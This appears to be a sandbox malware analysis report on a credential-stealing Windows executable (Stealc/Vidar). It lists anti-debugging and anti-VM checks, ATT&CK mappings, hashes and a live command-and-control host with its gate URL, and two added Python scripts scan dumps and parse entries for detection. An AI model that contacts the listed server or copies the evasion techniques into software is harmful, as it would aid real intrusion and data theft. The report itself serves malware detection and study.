Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C4DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C4E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C54570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C4ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C53EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C4F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C4BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C4DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C41160 GetSystemInfo,ExitProcess
Source: file.exe, file.exe, 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1702489973.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1702489973.00000000008F7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1702489973.000000000087E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13346)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13343)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13357)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13365)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-13397)
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation
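The "Binary or memory string" entries above (HARDWARE\ACPI\DSDT\VBOX__, VMwareVMware, Hyper-V RAW, Oreans.vxd, Software\WinLicense) and the rdtsc pairs in the interceptor entries are static artifacts: they can be hunted for in a process dump without re-running the sample. The following Python is an added example written for this page, not Joe Sandbox code and not a rule the report ships. It scans a constructed byte blob for those strings, grouped by what they indicate, and applies a byte-level heuristic for the timing stub the interceptor recorded: two 0F 31 (rdtsc) opcodes within a short window. The 64-byte window and the two groups are this example's assumptions; 0F 31 also occurs in ordinary data, so a pair hit is a lead for disassembly, not a verdict.

```python
"""Static scan of a memory dump for the VM/protector strings and rdtsc timing stubs
listed in this report. Added example for this page, not Joe Sandbox code. The blob
below is constructed; the 64-byte window and the string grouping are assumptions.
"""
RDTSC_OPCODE = b"\x0f\x31"

# Strings taken from the report's "Binary or memory string" entries.
ARTEFACTS = {
    "vm_detect": [b"HARDWARE\\ACPI\\DSDT\\VBOX__", b"VMwareVMware", b"Hyper-V RAW"],
    "protector": [b"Oreans.vxd", b"Software\\WinLicense"],
}


def find_strings(blob):
    """Return {group: [(offset, string), ...]} for every artefact occurrence."""
    found = {}
    for group, needles in ARTEFACTS.items():
        for needle in needles:
            pos = blob.find(needle)
            while pos != -1:
                found.setdefault(group, []).append((pos, needle.decode()))
                pos = blob.find(needle, pos + 1)
    return found


def find_rdtsc_pairs(blob, window=64):
    """Offsets of consecutive rdtsc opcodes closer than `window` bytes: the shape of a timing check."""
    offsets = []
    pos = blob.find(RDTSC_OPCODE)
    while pos != -1:
        offsets.append(pos)
        pos = blob.find(RDTSC_OPCODE, pos + 2)
    return [(a, b, b - a) for a, b in zip(offsets, offsets[1:]) if b - a <= window]


def scan(blob, window=64):
    """Combine both checks into one finding set; 'flags' names the categories that fired."""
    strings = find_strings(blob)
    pairs = find_rdtsc_pairs(blob, window)
    flags = sorted(strings)
    if pairs:
        flags.append("rdtsc_timing")
    return {"strings": strings, "rdtsc_pairs": pairs, "flags": flags}


# Constructed blob: a prologue, a timing stub (rdtsc; push eax; push edx; pushad;
# popad; jmp +0; rdtsc), nop padding, two of the report's strings, and two rdtsc
# opcodes far apart that must not pair at the default window.
SAMPLE_BLOB = (
    b"\x55\x8b\xec"                       # push ebp; mov ebp, esp
    + b"\x0f\x31"                          # rdtsc (offset 3)
    + b"\x50\x52\x60\x61\xeb\x00"          # push eax; push edx; pushad; popad; jmp +0
    + b"\x0f\x31"                          # rdtsc (offset 11)
    + b"\x90" * 200
    + b"HARDWARE\\ACPI\\DSDT\\VBOX__\x00"
    + b"Software\\WinLicense\x00"
    + b"\x0f\x31" + b"\x00" * 300 + b"\x0f\x31"
)

if __name__ == "__main__":
    r = scan(SAMPLE_BLOB)
    print("flags:", r["flags"])
    print("rdtsc pairs (start, end, gap):", r["rdtsc_pairs"])
    for group, hits in r["strings"].items():
        print(group, hits)
```

Run it against a real dump with `scan(open(path, "rb").read())`; widen the window only when a pair is expected to wrap real code, as the entries at 113624B and 4EF02E1 above do, and confirm every pair in a disassembler before treating it as a timing check.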

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C445C0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C59860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C59750 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C578E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard
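The RDTSC interceptor entries earlier on this page and the anti-debugging entries in this section are easier to triage parsed than read raw. The following Python is an added example written for this page, not Joe Sandbox code. It parses a handful of entries copied from this report (the list is constructed inline and keeps the glued "file.exeRDTSC" form and the "Jump to behavior" residue the page shows), splits each RDTSC pair into the instruction stream between the two reads, separates pairs whose filler is only register push/pop, pushad/popad and jumps from pairs that wrap real work (mov, call, xchg), and collects the window names, device names, registry values and process/thread queries as indicators. The filler/real-work split is this example's own heuristic, not the sandbox's.

```python
"""Triage Joe Sandbox behavior entries: RDTSC interceptor pairs and anti-debug indicators.

Added example for this report page, not Joe Sandbox code. The SAMPLE entries are
constructed by copying lines from the report; the filler/real-work split is this
script's own heuristic.
"""
import re

RDTSC_RE = re.compile(
    r"RDTSC instruction interceptor: First address: (?P<first>[0-9A-F]+)"
    r" second address: (?P<second>[0-9A-F]+) instructions: (?P<body>.+)$"
)
OFFSET_RE = re.compile(r"0x[0-9a-f]{8} ")   # each listed instruction is preceded by its byte offset
REGS = {"eax", "ebx", "ecx", "edx", "esi", "edi", "ebp", "esp"}
FLOW = {"jmp", "jo", "jno", "js", "jns", "je", "jz", "jne", "jnz", "jb", "jc", "jnb", "jnc",
        "jbe", "ja", "jl", "jnl", "jge", "jle", "jng", "jg", "jp", "jpe", "jnp", "jpo"}

INDICATOR_RES = {
    "window": re.compile(r"Open window title or class name: (.+)$"),
    "device": re.compile(r"File opened: (\S+)$"),
    "registry": re.compile(r"Registry key queried: (\S+) name: (\S+)$"),
    "process_query": re.compile(r"Process queried: (\S+)$"),
    "thread_info": re.compile(r"Thread information set: (\S+)$"),
}


def is_filler(insn):
    """Stack-neutral or flag-only instructions the protector sprinkles between the two reads."""
    mnemonic, _, operands = insn.partition(" ")
    if mnemonic in {"pushad", "popad", "nop"} or mnemonic in FLOW:
        return True
    return mnemonic in {"push", "pop"} and operands.strip() in REGS


def parse_rdtsc_line(line):
    """Return the two rdtsc sites and the instruction stream between them, or None."""
    m = RDTSC_RE.search(line)
    if not m:
        return None
    insns = [p.strip() for p in OFFSET_RE.split(m["body"]) if p.strip()]
    inner = insns[1:-1]                       # drop the two rdtsc instructions themselves
    real_work = [i for i in inner if not is_filler(i)]
    return {
        "first": int(m["first"], 16),
        "second": int(m["second"], 16),
        "count": len(insns),
        "inner": [i.split()[0] for i in inner],
        "real_work": real_work,
        "junk_only": not real_work,
    }


def parse_indicator(line):
    """Map one anti-debug/anti-VM entry to (category, value); None if it is not one."""
    line = line.replace("Jump to behavior", "").rstrip()   # page residue appended to some entries
    for category, rx in INDICATOR_RES.items():
        m = rx.search(line)
        if m:
            return category, " -> ".join(m.groups())
    return None


def triage(lines):
    pairs, indicators = [], {}
    for line in lines:
        pair = parse_rdtsc_line(line)
        if pair:
            pairs.append(pair)
            continue
        hit = parse_indicator(line)
        if hit:
            indicators.setdefault(hit[0], set()).add(hit[1])
    return {
        "rdtsc": pairs,
        "junk_only": sum(p["junk_only"] for p in pairs),
        "with_work": sum(not p["junk_only"] for p in pairs),
        "indicators": {k: sorted(v) for k, v in indicators.items()},
    }


# Constructed sample: entries copied from this report.
SAMPLE = [
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C3BF9 second address: 10C3C57 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007F72FCF2ACC6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F72FCF2ACCFh 0x00000014 push esi 0x00000015 jmp 00007F72FCF2ACD4h 0x0000001a jo 00007F72FCF2ACC6h 0x00000020 pop esi 0x00000021 jl 00007F72FCF2ACC8h 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d jmp 00007F72FCF2ACD8h 0x00000032 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CBD9D second address: 10CBDA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113624B second address: 1136280 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F72FCC0D446h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edx, 6F945F5Ah 0x00000012 push 00000004h 0x00000014 mov dx, cx 0x00000017 call 00007F72FCC0D449h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F72FCC0D453h 0x00000023 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF02E1 second address: 4EF02F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg",
    r"Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class",
    r"Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com",
    r"Source: C:\Users\user\Desktop\file.exeFile opened: NTICE",
    r"Source: C:\Users\user\Desktop\file.exeFile opened: SICE",
    r"Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID",
    r"Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior",
]

if __name__ == "__main__":
    result = triage(SAMPLE)
    print(f"rdtsc pairs: {len(result['rdtsc'])} "
          f"({result['junk_only']} filler-only, {result['with_work']} wrapping real work)")
    for p in result["rdtsc"]:
        if p["real_work"]:
            print(f"  {p['first']:08X}-{p['second']:08X}: {p['real_work']}")
    for category, values in result["indicators"].items():
        print(f"{category}: {values}")
```

Feeding it the full report text (one entry per line) gives the split that matters for reversing: most pairs here are filler-only, which is the protector measuring its own junk for a timing delta, while the few that wrap a mov/call/xchg mark where real code sits inside the timed region and is the better place to start when unpacking.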

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7260, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C59600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: #Program Manager
Source: file.exe | Binary or memory string: Y#Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C57B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C57980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C57850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C57A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1702489973.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1662202182.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7260, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.file.exe.c40000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1702489973.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1662202182.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7260, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                MITRE ATT&CK matrix, one line per tactic. The matrix grid was flattened in extraction; the counter that the report prints in front of a technique is kept as printed, and only the entries carrying such a counter were matched by this analysis.

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                Source | Detection | Scanner | Label
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php# | 19% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.phps | 17% | Virustotal |
                http://185.215.113.37/ws | 17% | Virustotal |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware; URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37O | file.exe, 00000000.00000002.1702489973.000000000087E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.1702489973.000000000087E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php&8 | file.exe, 00000000.00000002.1702489973.00000000008E5000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpDWF | file.exe, 00000000.00000002.1702489973.00000000008DA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/ws | file.exe, 00000000.00000002.1702489973.00000000008DA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php# | file.exe, 00000000.00000002.1702489973.00000000008C5000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phps | file.exe, 00000000.00000002.1702489973.00000000008C5000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                The trailing characters on several of the memory-sourced entries (O, &8, DWF, s, #) are most likely bytes adjacent to the URL when it was carved from the process memory dump, not distinct paths; the traffic capture below shows exactly one gate, http://185.215.113.37/e2b1563c6670f193.php, plus the bare host.
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1522624
                      Start date and time:2024-09-30 13:10:10 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 2m 47s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:1
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 86
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated
                      No simulations
                Match: 185.215.113.37
                Associated Sample Name / URL | Detection | Threat Name | Context
                file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                4qIl08vrFY.exe | malicious | Amadey, Stealc | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                SecuriteInfo.com.Win32.Evo-gen.16378.4678.exe | malicious | Amadey, Stealc | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                      No context
                Match: WHOLESALECONNECTIONSNL
                Associated Sample Name / URL | Detection | Threat Name | Context
                file.exe | malicious | Stealc, Vidar | 185.215.113.37
                file.exe | malicious | Stealc | 185.215.113.37
                file.exe | malicious | Stealc | 185.215.113.37
                4qIl08vrFY.exe | malicious | Amadey, Stealc | 185.215.113.103
                file.exe | malicious | Stealc, Vidar | 185.215.113.37
                file.exe | malicious | Stealc | 185.215.113.37
                file.exe | malicious | Stealc, Vidar | 185.215.113.37
                SecuriteInfo.com.Win32.Evo-gen.16378.4678.exe | malicious | Amadey, Stealc | 185.215.113.103
                file.exe | malicious | Stealc | 185.215.113.37
                file.exe | malicious | Stealc | 185.215.113.37
                      No context
                      No context
                      No created / dropped files found
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.948735669322834
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'867'776 bytes
                      MD5:bb08552092b4a0fe9610493efde4ddfc
                      SHA1:e4bd47f98aa7e1d41c6c2265ca45d606b49ba023
                      SHA256:094b280b1e8ecb2574307e5f44d1678b3abe07c71ebfe779a7dd914bf789292b
                      SHA512:628ee5f98b6707073e80752df9a8b2d628dde1deb9ae7a0c712880d0b3530b390d98c3a049f4d3cb0d0d465ad2b42664829c014f80959df5e19b5ec391b25edb
                      SSDEEP:49152:9s1ARbBuUn5UYkPP2TFy7f3ocwCAtuWHkKaf:m1AhBuUhkP+fZC/WETf
                      TLSH:858533EDB382DBA8CDD4A6F5469C1D40FEDA6213DA13973A470E93013E3763826853B5
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                      Icon Hash:90cececece8e8eb0
                      Entrypoint:0xaa6000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                Instruction (entry-point disassembly; consecutive identical lines collapsed with a repeat count)
                jmp 00007F72FD26F3DAh
                divps xmm3, dqword ptr [eax+eax]
                add byte ptr [eax], al (x2)
                jmp 00007F72FD2713D5h
                add byte ptr [0000000Ah], al
                add byte ptr [eax], al
                add byte ptr [eax], dh
                add byte ptr [eax], al (x4)
                or byte ptr [eax], al
                add byte ptr [eax], al (x6)
                add byte ptr [0000000Ah], al
                add byte ptr [eax], al (x61)
                add byte ptr [ecx], al
                add byte ptr [eax], 00000000h
                add byte ptr [eax], al (x2)
                adc byte ptr [eax], al
                add byte ptr [eax], al (x3)
                add dword ptr [edx], ecx
                add byte ptr [eax], al (x3)
                Every "add byte ptr [eax], al" is the decoding of two zero bytes (00 00): past the two jmp instructions the entry point, which sits in the .taggant section rather than in a code section, is followed by padding, not real code.
                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
